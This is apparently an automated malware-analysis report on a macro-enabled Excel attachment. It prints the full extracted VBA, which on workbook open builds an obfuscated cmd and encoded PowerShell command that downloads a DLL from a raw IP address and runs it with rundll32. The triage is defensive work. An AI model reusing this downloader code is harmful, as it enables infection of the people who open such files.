Verdict: MALICIOUS
Risk Score: 130
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1071.001 Web Protocols
The file is an XLSM document containing VBA macros, with a critical heuristic firing for potential Shell execution. The Workbook_Open macro is present, indicating automatic execution upon opening. While the VBA code is truncated, it appears to be designed to execute arbitrary commands, likely for downloading and running a secondary payload. No specific family could be identified.
Heuristics 5
- VBA project inside OOXML (medium, OOXML_VBA, 3 related findings): Document contains a VBA project; VBA macros present.
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA. Matched line in script:
  wer = te + Shell(hkiwe + " " + wkjh, 0)
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Triggers on the combination of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- Workbook_Open macro (low, OLE_VBA_WBOPEN): Workbook_Open macro. Matched line in script:
  Private Sub Workbook_Open()
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 6227 bytes |

SHA-256: 8a7e7819df6b91f47eafc2ab79d0af373d8adb5e25bdbaf0c3846296f5a42d91
Detection
ClamAV: No threats found
Obfuscation or payload: likely (carved artifact contains 1 long base64-like blob(s))
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub df4yw35yhdf()
Dim iCount As Long, i As Long, j As Long, k As Long
Dim Str1 As String, Str2 As String
k = 1
iCount = Selection.Cells.Count
For i = k To iCount
Str1 = CStr(Selection.Cells(i).Value)
If Str1 <> "" Then
For j = i To iCount
Str2 = CStr(Selection.Cells(j).Value)
If i <> j And Str1 = Str2 Then Selection.Cells(j).ClearContents
Next j
End If
Next i
End Sub
Sub erfllj()
Dim lr As Long
Dim lAllCnt As Long
lAllCnt = 10000
For lr = 1 To lAllCnt
If bShowBar Then Call MyProgresBar
Next
If bShowBar Then Unload frmStatusBar
End Sub
Sub bwla4kl()
Dim lr As Long, lp As Double
Dim lAllCnt As Long
Dim s As String
lAllCnt = 10000
For lr = 1 To lAllCnt
lp = lr \ 100
s = String(lp \ 10, ChrW(10152)) & String(11 - lp \ 10, ChrW(8700))
Application.StatusBar = "????: " & lp & "% " & s: DoEvents
DoEvents
Next
Application.StatusBar = False
End Sub
Function ertjwlkfj(flkas As Long, fewo4ih As String, hnfkl34 As String, ndr54 As Long, bvret As Long) As Integer
Dim fhks, hkj23, hkiwe, wkjh As String
Dim wer As Double
fhks = "pcw"
hkj23 = fhks & "w"
fhks = "jLwCjLw:jLw\jLwWjLwijLwndjLwowjLws\SjLwysjLwtejLwm3jLw2\cjLwmjLwd.jLwejLwxjLwe"
For i = 1 To 20
Dim uow As Double
If i = 998 Then
MsgBox "q34"
End If
Next
hkiwe = rhqwoelhsld(fhks, "jLw")
wer = wer + 1
hkj23 = "aYk/aYkc saYktaaYkraYkt /aYkB /WaYkAIaYkT paYkoaYkweaYkrsaYkheaYklaYkl aYk-aYkenaYkc SQaYkBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACIAaAB0AHQAcAA6AC8ALwaYkA0ADUALgA4ADYALgA2ADUALgAxADkANwAvAGkAbQBhAGcAZQBzaYkAC8AcwB1AGIAegBlAHIAbwAuAHAAbgBnACIAIAAtAE8AdaYkQB0AEYAaQBsAGUAIAAiAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABaYkhAHQAYQBcAGMAbABiAC4AZABsAGwAIgaYkA" & "aYk=" + " aYk& saYktaYkaraYkt aYkCaYk:aYk\aYkWaYkinaYkdoaYkws\SaYkysaYkteaYkmaYk3aYk2\raYkunaYkdlaYkl3aYk2.aYkeaYkxaYke aYkCaYk:aYk\aYkPraYkoaYkgraYkamaYkDaaYktaYka\caYklb.daYklaYkl,AlaYkoperNotaYkeaYkW"
For i = 5 To 30
Dim e As Integer
If i = 998 Then
e = e + i
End If
Next
wkjh = rhqwoelhsld(hkj23, "aYk")
For i = 1 To 20000000
Dim te As Double
te = Sin(i)
If i = 19999998 Then
wer = te + Shell(hkiwe + " " + wkjh, 0)
End If
Next
ertjwlkfj = 0
End Function
Sub gwolkel()
Dim lr As Long
Dim lAllCnt As Long
Const lMaxQuad As Long = 20
lAllCnt = 10000
For lr = 1 To lAllCnt
Application.StatusBar = "???: " & Int(100 * lr / lAllCnt) & "%" & String(CLng(lMaxQuad * lr / lAllCnt), ChrW(9632)) & String(lMaxQuad - CLng(lMaxQuad * lr / lAllCnt), ChrW(9633))
DoEvents
Next
Application.StatusBar = False
End Sub
Function rhqwoelhsld(ByVal jlvfd As String, bxcj As String) As String
If jlvfd = "2" And bxcj = "2" Then
Dim d As Byte
d = CByte(jlvfd)
Else
rhqwoelhsld = Replace(jlvfd, bxcj, "")
End If
End Function
Sub dgfjsldk()
Dim Workbooks As Object
NbCol = Workbooks(Fname1).Sheets(LName).Rows(1).Find(What:="Дата", LookIn:=xlValues, SearchDirection:=xlPrevious, SearchOrder:=xlByColumns).Column
Dim a(), i As Long
i = Workbooks(Fname1).Sheets(LName).Cells(Rows.Count, 1).End(xlUp).Row
a = Range(Workbooks(Fname1).Sheets(LName).Cells(1, NbCol), Workbooks(Fname1).Sheets(LName).Cells(i, NbCol)).Value
ReDim B(1 To i, 1 To 1)
Do While i > 1
If dMain.exists(a(i, 1)) Then B(i, 1) = 1
i = i - 1
Loop
Dim x As Range
NbCol = Workbooks(Fname1).Sheets(LName).Cells(1, Columns.Count).End(xlToLeft).Column + 2
Erase B
Set x = Range(Workbooks(Fname1).Sheets(LName).Cells(1, NbCol), Workbooks(Fname1).Sheets(LName).Cells(Rows.Count, NbCol)).Find(1, , , xlWhole)
If Not x Is Nothing Then
Range(Workbooks(Fname1).Sheets(LName).Cells(1, NbCol), Workbooks(Fname1).Sheets(LName).Cells(Rows.Count, NbCol)).ColumnDifferences(x).EntireRow.Hidden = True
End If
End Sub
Private Sub Workbook_Open()
Dim fojn As Long
Dim x, y, z As Double
Dim hnfkj As String
wejlfkdjf
hnfkj = "a"
End Sub
Public Sub wejlfkdjf()
Dim fojn As Long
Dim fjl As String
fjl = "w"
fojn = ertjwlkfj(0, "", "", 0, 0)
If fojn = 123 Then
fjl = "r" & fjl
End If
End Sub
Sub ghayh45aghf()
Dim lAllCnt As Long, lr As Long
Dim rc As Range
lAllCnt = Selection.Count
For Each rc In Selection
lr = lr + 1
Application.StatusBar = "??: " & Int(100 * lr / lAllCnt) & "%"
DoEvents
Next
Application.StatusBar = False
End Sub
Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Лист2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Лист3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 27648 bytes |

SHA-256: 5362a865257aaafdd7503136b910382ca531abb77dbd01c8752c8a55e02b821b
Detection
ClamAV: No threats found
Obfuscation or payload: likely (carved artifact contains 1 long base64-like blob(s))